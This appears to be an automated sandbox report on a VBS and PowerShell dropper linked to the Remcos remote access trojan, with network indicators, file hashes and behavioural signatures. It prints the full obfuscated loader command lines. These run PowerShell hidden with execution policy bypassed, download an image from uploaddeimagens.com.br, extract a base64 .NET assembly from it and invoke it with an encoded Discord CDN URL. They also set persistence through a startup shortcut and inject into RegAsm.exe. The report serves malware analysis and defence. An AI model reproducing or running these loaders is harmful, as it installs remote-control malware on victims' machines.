DJDsDEWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsKQWOQNgdNPWgDJDs7WOQNgdNPWgDJDsFoWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsG0WOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsZQB0WOQNgdNPWgDJDsGgWOQNgdNPWgDJDsbwBkWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsPQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsHQWOQNgdNPWgDJDseQBwWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsLgBHWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBNWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBoWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZWOQNgdNPWgDJDsWOQNgdNPWgDJDsoWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsdQBuWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBJWOQNgdNPWgDJDsG4WOQNgdNPWgDJDsdgWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBvWOQNgdNPWgDJDsGsWOQNgdNPWgDJDsZQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsG4WOQNgdNPWgDJDsdQBsWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsgWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsbwBiWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsZQBjWOQNgdNPWgDJDsHQWOQNgdNPWgDJDsWwBdWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDsoWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsEoWOQNgdNPWgDJDsagBCWOQNgdNPWgDJDsGgWOQNgdNPWgDJDsWQBtWOQNgdNPWgDJDsE0WOQNgdNPWgDJDsegBZWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsYwB3WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsagBNWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsTgBqWOQNgdNPWgDJDsFEWOQNgdNPWgDJDseWOQNgdNPWgDJDsBNWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsSgBsWOQNgdNPWgDJDsE4WOQNgdNPWgDJDsegBBWOQNgdNPWgDJDsHkWOQNgdNPWgDJDsWQBUWOQNgdNPWgDJDsGcWOQNgdNPWgDJDsNQBOWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsQQWOQNgdNPWgDJDswWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsVwBWWOQNgdNPWgDJDsGsWOQNgdNPWgDJDsTQBqWOQNgdNPWgDJDsGsWOQNgdNPWgDJDsMwBZWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsZWOQNgdNPWgDJDsBqWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsagBJWOQNgdNPWgDJDsDQWOQNgdNPWgDJDsWQB6WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBNWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsSQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsE4WOQNgdNPWgDJDsagBZWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsTgBEWOQNgdNPWgDJDsGsWOQNgdNPWgDJDsMQBZWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsTQB4WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsRwBZWOQNgdNPWgDJDsHgWOQNgdNPWgDJDsTQBEWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsVQB3WOQNgdNPWgDJDsFoWOQNgdNPWgDJDsVwBFWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsYgBXWOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbQBOWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsxWOQNgdNPWgDJDsE8WOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsRWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsDMWOQNgdNPWgDJDsTgBUWOQNgdNPWgDJDsFkWOQNgdNPWgDJDsOQWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBjWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsawBtWOQNgdNPWgDJDsE4WOQNgdNPWgDJDsagBkWOQNgdNPWgDJDsGgWOQNgdNPWgDJDsWgBqWOQNgdNPWgDJDsEkWOQNgdNPWgDJDsNWOQNgdNPWgDJDsBOWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsWQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGUWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsRwBVWOQNgdNPWgDJDsC8WOQNgdNPWgDJDsZWOQNgdNPWgDJDsBIWOQNgdNPWgDJDsGgWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsG0WOQNgdNPWgDJDsbWOQNgdNPWgDJDsBwWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsVwBsWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsyWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsagBiWOQNgdNPWgDJDsFcWOQNgdNPWgDJDsVgB5WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBNWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsTQBqWOQNgdNPWgDJDsE0WOQNgdNPWgDJDsNQBNWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsQQWOQNgdNPWgDJDs1WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsegBJWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsTwBEWOQNgdNPWgDJDsFUWOQNgdNPWgDJDsMgBPWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsRQWOQNgdNPWgDJDs0WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBFWOQNgdNPWgDJDsHYWOQNgdNPWgDJDsTQBEWOQNgdNPWgDJDsFUWOQNgdNPWgDJDseWOQNgdNPWgDJDsBPWOQNgdNPWgDJDsEQWOQNgdNPWgDJDsWQB4WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBJWOQNgdNPWgDJDsDWOQNgdNPWgDJDsWOQNgdNPWgDJDsTQBqWOQNgdNPWgDJDsFEWOQNgdNPWgDJDsMQBOWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsWQWOQNgdNPWgDJDs1WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsHgWOQNgdNPWgDJDsTQBTWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsegBkWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsNQBsWOQNgdNPWgDJDsGIWOQNgdNPWgDJDsVwBoWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsWQBYWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBZWOQNgdNPWgDJDsFMWOQNgdNPWgDJDsOQB0WOQNgdNPWgDJDsGIWOQNgdNPWgDJDsMgBNWOQNgdNPWgDJDsHUWOQNgdNPWgDJDsYwBIWOQNgdNPWgDJDsEIWOQNgdNPWgDJDsaWOQNgdNPWgDJDsBaWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsSgB2WOQNgdNPWgDJDsFkWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsWgBDWOQNgdNPWgDJDsDUWOQNgdNPWgDJDsdQBaWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsTQB2WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBwWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBIWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsPQWOQNgdNPWgDJDs9WOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZwBvWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsMwWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBDWOQNgdNPWgDJDsDoWOQNgdNPWgDJDscgBCWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsUWOQNgdNPWgDJDsByWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwByWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsbQBEWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsQgBBWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsbwBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDspWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsJwWOQNgdNPWgDJDspWOQNgdNPWgDJDsC4WOQNgdNPWgDJDsUgBlWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsTWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsGMWOQNgdNPWgDJDsRQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsJwWOQNgdNPWgDJDssWOQNgdNPWgDJDsFsWOQNgdNPWgDJDscwBUWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsaQBOWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsXQBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDszWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsuWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsZQBwWOQNgdNPWgDJDsEwWOQNgdNPWgDJDsQQBjWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsKWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsLWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsHMWOQNgdNPWgDJDsVWOQNgdNPWgDJDsByWOQNgdNPWgDJDsGkWOQNgdNPWgDJDsTgBHWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsWwBDWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsQQByWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsMwWOQNgdNPWgDJDs2WOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBSWOQNgdNPWgDJDsGUWOQNgdNPWgDJDscWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsYwBFWOQNgdNPWgDJDsCgWOQNgdNPWgDJDsKWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsNWOQNgdNPWgDJDsWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNgWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNQWOQNgdNPWgDJDspWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsJwBcWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCkWOQNgdNPWgDJDs';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.97.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
Files
memory/2108-4-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
memory/2108-5-0x0000000001F30000-0x0000000001F38000-memory.dmp
memory/2108-6-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2108-9-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2108-8-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2108-7-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2108-10-0x0000000002670000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 15d4809caca3629636c5c6c26f548215 |
| SHA1 | 0a9d8133f706b0a0516be6add488210a8e2e658c |
| SHA256 | 0ed60766be5a6d05292f266cdbd3b11431f2f150963aff419a777dfc719b1efb |
| SHA512 | d6190ed4cb7004fe0d42d21e60b9a3a5d7c92698a614d384adcd5eb91094101dd951d3baec0cbf4feec804469c0e0a382473a726a91d18f5c28c85efe1a53b26 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1FL009OPH6QXM53LOSSE.temp
| MD5 | 15d4809caca3629636c5c6c26f548215 |
| SHA1 | 0a9d8133f706b0a0516be6add488210a8e2e658c |
| SHA256 | 0ed60766be5a6d05292f266cdbd3b11431f2f150963aff419a777dfc719b1efb |
| SHA512 | d6190ed4cb7004fe0d42d21e60b9a3a5d7c92698a614d384adcd5eb91094101dd951d3baec0cbf4feec804469c0e0a382473a726a91d18f5c28c85efe1a53b26 |
memory/2648-16-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2648-17-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/2648-18-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2648-19-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/2648-20-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/2648-21-0x0000000002830000-0x00000000028B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab6911.tmp
| MD5 | f3441b8572aae8801c04f3060b550443 |
| SHA1 | 4ef0a35436125d6821831ef36c28ffaf196cda15 |
| SHA256 | 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf |
| SHA512 | 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar6A02.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8bbcb72b384f37e517e47ee1a6cf7bef |
| SHA1 | 3e8a27638c1c621b961e96cf543bb9f78e35a6eb |
| SHA256 | e75548d9897b3d0d41dfc2792076bbf06dd7e4b7843db7878da81b9857370a7f |
| SHA512 | 3efa534f770b26ae41ec54ee4a9db8fb1ce18f5bfb2dffe6ed03d2123b8d9ac6a5e0bcd84eb59921f6ba8117967642c93d20b142975caa5b0b811c8a40959879 |
memory/2648-88-0x000000001B680000-0x000000001B68A000-memory.dmp
memory/2648-89-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2108-90-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-07 12:48
Reported
2023-12-07 12:50
Platform
win10v2004-20231130-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-433534792-1200107535-3148087551-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1668 set thread context of 1460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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